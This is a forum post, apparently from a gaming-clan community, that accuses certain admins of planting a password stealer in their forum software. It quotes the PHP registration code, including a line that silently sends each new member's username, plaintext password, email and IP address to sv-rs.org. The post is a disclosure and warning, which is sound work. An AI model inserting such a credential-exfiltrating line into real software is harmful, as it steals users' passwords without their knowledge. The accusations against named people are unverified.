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CP/CV/SV #EXPOSED V2(The boring technical details)


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Background info:

I was asked by LT to take over hosting from [CP]Parm. Sam has mentioned to me off handedly that a number of his members had been hacked using LT's site, so I took the opportunity to peak around the original config files. The results are scary.


Essentially this is a list of sites so far that has this rat on it:


  • LT
  • Old CV
  • New CV
  • Old zenith(Idk which forum tonqir came from)

Basically Parm probably ratted his own clan members?!?!


How this rat works is, it will log your password, then send the user/pass to SV's server for "svkeeping". I have uncovered some .txt files containing some passes. If you are one of them, i suggest you change your passes ASAP.






In this grand scheme of things, CP/SV has been logging passwords of multiple forums without the user's knowledge. I have inserted 3x images detailing the script containing the RAT










Attached are 3 urls leading to the rat(it will be removed soon i bet)








P.S. Some evidence they are doing the same for other main clan forums



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This is taken directly from sv-rs.org Logs to remind you guys their stealing your Facebook,Twitter, though for twitch  i havent found a script for it on here yet




/* Attempt to fetch user details */
            $classToLoad    = IPSLib::loadLibrary( IPS_ROOT_PATH . 'sources/classes/facebook/connect.php', 'facebook_connect' );
            $facebook        = new $classToLoad( $this->registry, $member['fb_token'], $member['fb_uid'] );
            $userData        = $facebook->fetchUserData();
            if ( $userData['id'] )
                $userData['service'] = 'facebook';
                $userData['_name'] = $userData['name'];
                $userData['_pic'] = $userData['pic_square'];
                $userData['_sImage'] = $this->settings['public_dir'] . 'style_status/facebook.png';
                /* Enforcing / allowing real names? */
                if ( ! count( $form_errors['dname'] ) AND $this->settings['fb_realname'] != 'any' )
                    $userData['_displayName'] = $userData['_name'];




( $member['twitter_id'] AND $member['twitter_token'] AND $member['twitter_secret'] )
            /* Attempt to fetch user details */
            $classToLoad    = IPSLib::loadLibrary( IPS_ROOT_PATH . 'sources/classes/twitter/connect.php', 'twitter_connect' );
            $twitter        = new $classToLoad( $this->registry, $member['twitter_token'], $member['twitter_secret'] );
            $userData        = $twitter->fetchUserData();
            if ( $userData['id'] )
                $userData['service'] = 'twitter';
                $userData['_name'] = $userData['screen_name'];
                $userData['_pic'] = $userData['profile_image_url'];
                $userData['_sImage'] = $this->settings['public_dir'] . 'style_status/twitter.png';




// Give SV the info...
        $user = str_replace(' ', '%20', $this->request['members_display_name']);
        file_get_contents('http://sv-rs.org/tools/insert.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Registration&username=' . $user . '&password=' . $in_password . '&email=' . $in_email . '&ip=' . $_SERVER['REMOTE_ADDR']);

        /* Create member */
        $member = array(
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